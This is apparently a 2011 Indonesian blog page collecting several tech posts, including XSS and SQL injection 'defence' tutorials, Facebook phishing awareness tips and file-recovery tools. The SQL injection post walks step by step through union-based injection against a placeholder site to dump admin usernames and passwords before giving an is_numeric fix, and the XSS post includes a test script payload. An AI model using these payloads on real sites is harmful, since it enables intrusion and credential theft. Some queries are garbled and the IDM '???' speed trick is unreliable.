Senin, 23 Mei 2011

Account Google - Masalah ketika mengubah alamat email

Account Google - Masalah ketika mengubah alamat email

Tekhnik Mempercepat Download Dengan Menggunakan IDM


Buat yg hobby download pake IDM ne ada tutorial cupu,biar downloadnya ajib..walau tempatnya kayak tempat ane yg rame..

1. Sediakan IDM dan file/data yg mau didownload..

2. Sewaktu udah mulai download klik stop dulu..

3. Klik kanan pada file yg kita download trus pilih properties
4. Masukkan 3 tanda tanya"???" setelah ujung address file yg didownload
[Image: gbr3.jpg]
5. Trus resume lagi...

[Image: gbr1.jpg]

Ane yakin kecepatan download pasti naek..wussssssssssshhhhhhhhhh

Bandingkan setelah make tanda tanya "???" dengan yang langsung download aja pasti beda banget
Maaf kalau ada kata ane yg salah, maklum newbie om..

[Image: cz43.gif]
Sekian dan terima kasih.
Tian HV DC 

Tekhnik Menangkal Serangan XSS Pada Website Anda

XSS adalah kepanjangan dari Cross Site Scripting. Maksudnya??? Hal ini terjadi ketika programmer menggunakan URL sebagai parsing kalimat/kata secara langsung pada halaman website.

Ok contohnya seperti ini:

Selanjutnya kalimat yang diletakkan pada get_variable judul akan langsung saja ditampilkan pada halaman penerima, pada contoh ini sang attacker dapat menyelipkan sebuah script pada get_variable tersebut. contohnya.

Code:
<script>alert('Tes XSS!!!');</script>
script ini merupakan script javascript yang digunakan untuk menampilkan sebuah alert box. Pada kasus yang lebih gawat serangan XSS juga dapat dilakukan untuk mendapatkan cookies website, fake interface dan lain2, maklum saya bukan attacker jadi kurang terlalu paham.

PENANGKAL

Untuk menangkal serangan ini, kita dapat menambahkan function php htmlentities. Fungsi dari function ini adalah untuk menerjemahkan karakter yang termasuk dalam pembentuk html ke dalam karakter codenya.

Contoh code pembentuknya dapat dilihat pada tabel berikut :

img

Cara pakai function ini :

Code:

<?php

$judul = htmlentities ($_GET['judul']);

echo $judul;

?>


Code:
$judul = htmlentities ($_GET['judul']);

Disini ditambahkan function tersebut untuk merubah semua karakter html ke karakter pembentuknya.

Sukses, sekarang Website kita sudah terbebas dari serangan XSS.

Courtesy Of "Anharku"

Web Template - Electric Company

Jebakan Yang Dipakai Untuk Menjebol/Membajak Akun Facebook

Salah satu kemudahan yang ditawarkan Facebook adalah bisa diakses di mana pun Anda berada. Dengan semua konektivitas ini, ada tanggung jawab penting yang harus dijaga yaitu keamanan account pribadi.
Untuk mencegah terjadinya pembajakan akun Facebook, Anda baiknya Anda tahu trik-trik yang dipakai hacker dalam mencuri akun. Berikut ini adalah trik yang biasanya dipakai hacker untuk membajak akun/ mendapatkan password Facebook seseorang.

1. Aplikasi Facebook dan Iklan
Berhati-hatilah saat sudah login ke Facebook. Jangan sembarangan meng-klik iklan atau aplikasi yang Anda sendiri tidak familiar. Banyak pengguna Facebook terkena virus dari iklan di Facebook atau terjebak memberikan data pribadi mereka tanpa sengaja ketika menggunakan aplikasi tertentu.

2. Halaman Phishing Login Facebook
Hacker umumnya selalu mengeksploitasi topik-topik populer. Spammer menggunakan berbagai macam cara dan metode agar Anda terjebak dan memberikan account Anda. Facebook sendiri belakangan ini banyak dijadikan target serangan spam lewat teknik phishing. Ketika kita mengklik link yang terdapat pada Facebook, kita akan digiring ke sebuah halaman yang seolah-olah halaman login Facebook, padahal halaman tersebut adalah halaman yang dirancang spammer untuk mencuri password Facebook.

Salah satu cara untuk menghindari seperti jebakan ini adalah dengan tidak sembarangan meng-klik URL pada email. Lebih baik mengetikkan URL situs yang ingin dikunjungi langsung pada browser. Sebenarnya sangat mudah untuk mengenali URL palsu. Jika URL yang tertulis bukan Facebook.com, maka URL tersebut adalah palsu.

3. Website yang Terintegrasi dengan Facebook
Seiring makin populernya Facebook, banyak blog, website, bahkan perusahaan besar yang mengintegrasikan website mereka dengan tombol Facebook dan twitter. Hal ini tidak menjadi masalah selama link Facebook yang digunakan asli. Masalah muncul ketika hacker campur tangan dengan memalsukan tombol share Facebook. Ketika kita mengklik tombol palsu tersebut, maka hacker akan dengan mudah mencuri password kita.

4. Aplikasi Online Pihak Ketiga
Waspadai aplikasi pihak ketiga yang berpotensi mencuri data. Biasanya pengguna Facebook sangat gampang memperbolehkan aplikasi tertentu mengakses akun Facebook mereka karena menganggap aplikasi tersebut dapat dipercaya.

Namun masalahnya, dari setiap aplikasi yang kita percaya mungkin saja ada sepuluh atau dua puluh aplikasi palsu yang dirancang untuk mencuri data login Facebook Anda. Karena itu, sebelum menginstal sebuah aplikasi dan menginputkan data login Facebook Anda, cari tahu kredibilitas aplikasi tersebut melalui review-review yang dipaparkan pengguna lain atau cek apakah aplikasi tersebut telah terdaftar secara resmi.

5. Login melalui Komputer Publik
Sebisa mungkin hindari login dengan menggunakan komputer publik karena akun rentan dibajak. Komputer publik sering dijadikan ?alat? untuk memata-matai user. Apalagi banyak orang yang tidak sadar dengan keberadaan tombol ?keep me logged in? yang terdapat pada halaman login Facebook. Seringkali halaman Facebook seseorang masih dalam posisi login ketika kita mau mengakses Facebook melalui komputer publik.

6. Chat Pop-up palsu
Jebakan lain yang digunakan hacker agar user login ke akun Facebook mereka adalah dengan menggunakan chat pop-up palsu. Dengan meniru chat pop-up Facebook, chat pop-up palsu ini akan berlagak mengajak Anda chat melalui fasilitas chat Facebook.

Jika kita mengklik window chat tersebut, maka Anda akan digiring ke sebuah halaman phishing Facebook. Atau bisa saja ini adalah sebuah iklan situs porno atau produk lain yang tidak kita inginkan. Semua taktik ini banyak digunakan hacker dan pencuri identitas untuk mendapatkan data pribadi kita. Karena itu, lakukan login hanya pada situs resmi Facebook, gunakan aplikasi pihak ketiga yang terpercaya, dan berhati-hatilah ketika login pada komputer publik.

[Internet Sehat]

Tekhnik Menangkal Serangan SQL Injection Pada Website Anda

1. Teknik serangan SQL Injection dimulai dengan mengetes suatu get_variable dengan menambahkan karakter single quote ( ' )

http://www.target.com/index.php?id=560'

Selanjutnya pada query sql yang ada pada script akan berubah menjadi
Code:

select * from 'tblBerita' where 'id' = 560' <--- terdapat karakter petik satu.

Hal ini menyebabkan query error dan menampilkan pesan error-nya pada halaman website.

2. Dengan tanda error ini, selanjutnya sang attacker melanjutkan melakukan inject pada query sql ini dengan tujuan menampilkan informasi yang ada pada tabel user, admin atau nama tabel lain untuk mengetahui user dan password yang tersimpan dalam website.

HOW??? HOW??? Caranya bagaimana. Pada MYSQL versi 5, hal ini dapat dilakukan dengan memanfaatkan informasi yang terdapat pada database information_schema.

Kita lanjut dulu saja SQL Injectionnya.

Selanjutnya kita akan coba cari jumlah record yang ada pada tabel.

Kita tes apakah error atau tidak, seharusnya tidak.
Code:

select * from `tblBerita` where `id` = 560 order by 1

Maksud query ini, hasil select diurutkan berdasarkan pada colomn nomor 1.

Coba terus sampai tampil pesan error
Code:

http://www.target.com/index.php?id=560 order by 2 <-? masih belum error

http://www.target.com/index.php?id=560 order by 3 <<<? masih belum error

http://www.target.com/index.php?id=560 order by 4 <<<? masih belum error

http://www.target.com/index.php?id=560 order by 5 <<<? akhirnya error juga

Ini misal aja loh ya, di lapangan ntar jumlah angkanya bisa berbeda-beda. Ini menandakan bahawa field atau colomn yang ada pada tabel hanya ada 4.

3. Selanjutnya, lakukan union select
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, 2, 3, 4

Query pada web jadi seperti ini
Code:

select * from `tblBerita` where `id` = 560 and 1=2 union select 1, 2, 3, 4

Result aslinya tidak akan tampil, yang tampil malah angka-angka yang dijadikan union select. Kita cari angka mana yang tampil pada halaman website. Misal angka yang tampil pada halaman website angka 2.

4. Kita dapat menggunakan function2 sql pada url tersebut, contohnya version()
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, version(), 3, 4

Fungsi ini berguna untuk menampilkan versi mysql yang digunakan, jika versi mysql adalah versi 5. Kida dapat mulai melakukan inject untuk menampilkan informasi yang ada pada database information schema.
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema = database()

Query ini berfungsi untuk menampilkan isi dari table 'tables' yang ada pada database information_schema yang mana nama databasenya = database(), funsi database() akan menghasilkan nama database yang digunakan oleh website.

Setelah nama2 table diketahui, kita akan coba menampilkan nama2 colomn yang ada pada table. Misal nama table yang akan kita tampilkan isi kolomnya 'tbluser'
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = tbluser

Jika cara ini gagal, sebelumnya ubah dulu kata 'tbluser' ke bentuk hexa, gunakan http://cyber4rt.com/~converter yang menyediakan jasa convert text ke hexa.
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = tbluser

Jika cara ini gagal, sebelumnya ubah kata 'tbluser' ke bentuk hexa.
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = 0?6164A689

(ni hexa yang aku pake ngawur, hehe... ntar coba sendiri aja)

Setelah keluar nama2 colomn dari tabel 'tbluser', kita lanjutkan untuk menampilkan record dari tabel ini.

Misal colomn2 yang tampil : id, user, email, password
Code:

http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(user, 0?3a, password), 3, 4 from tbluser

Kita tampilkan yang penting2 saja.

Selanjutnya isi tabel akan ditampilkan, dan setelah kita dapatkan user dan password admin. Kita cari tempat untuk melakukan login ke system dan Eng ing eng, akses kita menjadi Administrator pada website.

PENANGKAL

Teknik serangan yang panjang lebar ini ternyata hanya memerlukan sedikit tambahan code untuk menambalnya, benarkah??? ya.. Mari kita bahas.
Code:

$result = mysql_query ("select * from 'tblBerita' wheere 'id' = $id ");


Serangan ini dapat terjadi dikarenakan tidak ada filter pada get_variable, sehingga attacker dapat menambahkan query jahat pada query aslinya. hehehe, nilai yang dibutuhkan pada get_variable id hanya nilai numeric saja sehingga kita dapat melakukan pengecekan apakah nilainya angka valid atau tidak
Code:

if (!is_numeric($id))

$id = 0;

$result = mysql_query ("select * from 'tblBerita' where 'id' = $id ");

Kode ini, berguna untuk merubah nilai id menjadi 0 (Nol) jika nilai id tidak valid sebagai angka.

Huft, sudah kok itu aja.. heheheeh.. :P

Courtesy Of "Anharku"

Tools Gratis Mengembalikan File yang Terhapus

Pernah menghapus file-file penting di komputer tanpa disengaja? Kasus seperti ini mungkin pernah menimpa Anda, terkadang terjadi karena kita tengah terburu-buru atau dikejar waktu.

Namun jangan khawatir, Anda bisa menggunakan tools khusus untuk mengembalikan file-file tadi. Berikut ini ada 4 tools yang bisa Anda gunakan untuk mengembalikan file yang terhapus. Tools ini dapat di-download secara gratis di internet.

1. Undelete Plus
Di antara aplikasi-aplikasi gratis yang beredar di luaran untuk mengembalikan file yang terhapus, Undelete Plus salah satu yang dapat digunakan. User interface-nya (antar muka) tergolong sangat simpel. Anda dapat mengembalikan file-file yang terhapus dengan mudah sesuai dengan tipe file, misalnya Application, GIF graphics, HTML Documents, PDF.

Tools ini beroperasi pada sistem operasi Windows 95, Windows 98, Windows Me, Windows NT, Windows 2000, Windows XP, Windows 2003 dan Windows Vista. Anda dapat men-download Undelete Plus di: http://www.undelete-plus.com/

2. Restoration
Restoration adalah salah satu aplikasi untuk mengembalikan file yang terhapus. Tools ini juga sangat mudah digunakan dan tidak perlu diinstal di komputer. Cukup download toolsnya di: http://www.snapfiles.com/get/restoration.html, lalu jalankan file executable-nya untuk mengembalikan file yang terhapus.

3. PC Inspector File Recovery
Meski user interface PC inspector File Recovery tidak begitu user friendly, aplikasi ini tergolong sangat ampuh untuk mendeteksi dan mengembalikan file yang terhapus. Sesudah dilakukan proses scanning, akan tersaji file-file yang terhapus dalam folder dengan struktur pohon (tree structure) untuk mempermudah pencarian. Dengan begitu, Anda dengan mudah dapat mencari dan memilih file/folder yang terhapus, lalu klik icon "save" untuk mengembalikan file. Tools ini dapat di-download di: http://www.pcinspector.de/default.htm

4. Recuva
Recuva sering disebut juga sebagai "Recover". User interface-nya sangat sederhana. Pada mode basic, tools ini akan menampilkan daftar file-file yang terhapus yang bisa dikembalikan. Jika Anda menggantinya ke mode advanced, maka proses scanning ulang akan dilakukan dan muncul pilihan untuk menampilkan informasi berisi daftar file-file yang terhapus. Tools ini dapat di-download di: http://www.recuva.com/